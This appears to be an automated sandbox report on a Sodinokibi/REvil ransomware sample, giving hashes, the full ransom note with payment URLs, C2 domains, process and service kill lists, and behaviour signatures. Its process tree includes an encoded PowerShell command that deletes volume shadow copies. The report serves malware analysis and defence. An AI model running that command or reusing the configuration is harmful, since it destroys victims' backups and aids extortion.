Analysis

  • max time kernel
    139s
  • max time network
    170s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:59

General

  • Target

    d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe

  • Size

    222KB

  • MD5

    42a2e208bc7721348699212bc5cf50e5

  • SHA1

    15934add1f6f10bc50daa707bf8d02bb62edbdf7

  • SHA256

    d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de

  • SHA512

    2549f5273ea6120dc18a97c1f59324e6e5696b15bf7f56a5c22c4d1c461fd6da200272aa58529b42a8e2ce6e8c8b1298030b38298bed9194b26882be8cb8cebb

Malware Config

Extracted

Path

C:\x0x4ph777-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension x0x4ph777. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BE7179A0F66FF074 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/BE7179A0F66FF074 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: cAbKs21KTFysqsRj1yEFvhO5oCDCEW4d1dVBtpx+63kctbguZamAwVDbjgVTSExj LcO8pQSotyWK97ZP0DmJkxeDi+vA5rZV5/ocvwvQNMvy7Zpsg9hadQbuvps34dko 9CnfcTeCbkYHzyXuIEyXDJAVovZoDXQJqHlCJ4LP/HA7r5wjNqdqdZee9WkoVC/L ki15ypzG+Kc2eItKEBuQUOHeH4bQYVwzD9GhVLBXCqPjGbwvx1xUMxWmk4B9AQJg J/4IJLnH+pAhH14biujpr1Lo3JjSi1edvajw9mB5VonrY6CjzO7kmBcPJXesXsJj jP4/euc6TGgbeDDHGXrf0a12KzfPbGZWsdhwYB/foE8N9D/lt5H94Ct769Kmwpvt Nwls+WDjMP8JhpH1h2rJ7Px7AhWUJCmB3/QtSRucmo8L6amk0gtYMqLNWnCs3x+D f8/LmnOnuF0TG38etRRew25qzq1UGCECL7cGJGqvn3PmhacPBL2rAnzAgHPFCWQU FfBUhfYamlMEFvdANSJCSXunwzmCcrOKalWx7tQLq4t3urZLqQfB6jiXLL5EcyKy PrcO9ogqr4fBFsVfKwG6oI0Bm11CzJMt2xSi2oKoyXgGQfTgd+w9bat9/4R8/NIb Reum46LReWmirHm58CQU7Qs86vsixiu3UWSLnuqvw/y3cdCOLAGr96Fq6l2Oh68Y cySNEPIA7ifDCzIIXZIh3xvlkuoTDsX9ap3yFeYy54EUHQfUgngzMatgheS2kHEx USZAs25kjynx/MlzsTEjYClW8QouJaxwCmUHIRQblop2G8VTzey/oIvyk3hjw7MW YGyJaoysqGGc30k17U5jn91GdZjQFiCibfQFcwUfo+vI1aQTb9rz1oIgZa6tkDZP 91URvrzcxHDXbg2lZQg10nmm6i5xHLuDtE05TfD9ADni96GGtWt8tjX9YHz+Zr3D 6QQFfd8h+JmeUdhJ1KniT+iw6W4s5EhmwjDXpWyKN8yz1jvXEhBcdrMAuV1UL7uv jGUoZr574Dhot0iBHSZx2vGo+BniJFnp5L5TZxH1UJXemePvsURPBnxcWdF0bRQK gYOqkl7adkO0iRPM+SnbIOzn0sHL2qzMJUa0Z8Ao2eHVFtXGhm3D/Li5gl42451m VVWCDQPu1DRG+Tr2u8MLvfk4PMOe7LL/RLc/072npjzm5DcCMK3Sj5+N4KHYyNf0 J5ZFog5ncOF4H8zVn28g93ht30zbjvgkhv73ZmKPYeRAEs0NOeXl1vjpoYMaIhmX IPtfqYKf44QrDWYIz2DymctypjMuQFNFR2DZffk/ ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BE7179A0F66FF074

http://decryptor.cc/BE7179A0F66FF074

Extracted

Family

sodinokibi

Botnet

$2a$10$SlLR2WWgiOxrDQLqdHYA/Or5zeu.wNuMGc5rN/HHrIObc1EkKCIZa

Campaign

3181

C2

vannesteconstruct.be

irishmachineryauctions.com

zervicethai.co.th

ymca-cw.org.uk

trystana.com

smessier.com

beautychance.se

sabel-bf.com

kafu.ch

aselbermachen.com

first-2-aid-u.com

finediningweek.pl

berlin-bamboo-bikes.org

lbcframingelectrical.com

augenta.com

abitur-undwieweiter.de

digi-talents.com

wellplast.se

conasmanagement.de

simpkinsedwards.co.uk

Attributes
  • net

    true

  • pid

    $2a$10$SlLR2WWgiOxrDQLqdHYA/Or5zeu.wNuMGc5rN/HHrIObc1EkKCIZa

  • prc

    agntsvc

    wordpad

    onenote

    mydesktopqos

    mydesktopservice

    thunderbird

    winword

    excel

    visio

    isqlplussvc

    dbeng50

    encsvc

    steam

    mspub

    firefox

    outlook

    dbsnmp

    ocautoupds

    xfssvccon

    tbirdconfig

    msaccess

    ocomm

    sqbcoreservice

    sql

    ocssd

    oracle

    infopath

    synctime

    thebat

    powerpnt

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    3181

  • svc

    svc$

    backup

    vss

    sophos

    memtas

    sql

    mepocs

    veeam

Signatures

  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe
    "C:\Users\Admin\AppData\Local\Temp\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe"
    1⤵
    • Modifies system executable filetype association
    • Loads dropped DLL
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Users\Admin\AppData\Local\Temp\3582-490\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Adds Run key to start application
      • Enumerates connected drives
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:456
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1988
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:828

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Change Default File Association

    1
    T1042

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    4
    T1112

    Install Root Certificate

    1
    T1130

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Collection

    Data from Local System

    1
    T1005

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\3582-490\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe
      MD5

      dbe120d11b3601be9d102ac83dbdc449

      SHA1

      3ecf3759ed50e08a3ee6e2dc298525baac0e861f

      SHA256

      0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999

      SHA512

      5769ff54058c023800fbf25939ae528e3f4ec7145553b666af9fc73087c7dab6ec37c762daa8a5741c29ed276babbfd3d626ad457ecc4308a0e71a4a52e399a3

    • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
      MD5

      9e2b9928c89a9d0da1d3e8f4bd96afa7

      SHA1

      ec66cda99f44b62470c6930e5afda061579cde35

      SHA256

      8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

      SHA512

      2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

    • \Users\Admin\AppData\Local\Temp\3582-490\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe
      MD5

      dbe120d11b3601be9d102ac83dbdc449

      SHA1

      3ecf3759ed50e08a3ee6e2dc298525baac0e861f

      SHA256

      0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999

      SHA512

      5769ff54058c023800fbf25939ae528e3f4ec7145553b666af9fc73087c7dab6ec37c762daa8a5741c29ed276babbfd3d626ad457ecc4308a0e71a4a52e399a3

    • \Users\Admin\AppData\Local\Temp\3582-490\d186adf9bf8ae0b9759a2836f94597d6832f076bd03de9886181be53183d25de.exe
      MD5

      dbe120d11b3601be9d102ac83dbdc449

      SHA1

      3ecf3759ed50e08a3ee6e2dc298525baac0e861f

      SHA256

      0a16f3a7610aa43ee770d81a5324b9d7d6cbc85f9968d215ccc4bc39fe884999

      SHA512

      5769ff54058c023800fbf25939ae528e3f4ec7145553b666af9fc73087c7dab6ec37c762daa8a5741c29ed276babbfd3d626ad457ecc4308a0e71a4a52e399a3

    • memory/456-59-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp
      Filesize

      8KB

    • memory/456-60-0x000007FEF2D00000-0x000007FEF385D000-memory.dmp
      Filesize

      11.4MB

    • memory/456-61-0x00000000028A0000-0x00000000028A2000-memory.dmp
      Filesize

      8KB

    • memory/456-63-0x00000000028A4000-0x00000000028A7000-memory.dmp
      Filesize

      12KB

    • memory/456-62-0x00000000028A2000-0x00000000028A4000-memory.dmp
      Filesize

      8KB

    • memory/456-64-0x00000000028AB000-0x00000000028CA000-memory.dmp
      Filesize

      124KB

    • memory/1684-54-0x0000000076421000-0x0000000076423000-memory.dmp
      Filesize

      8KB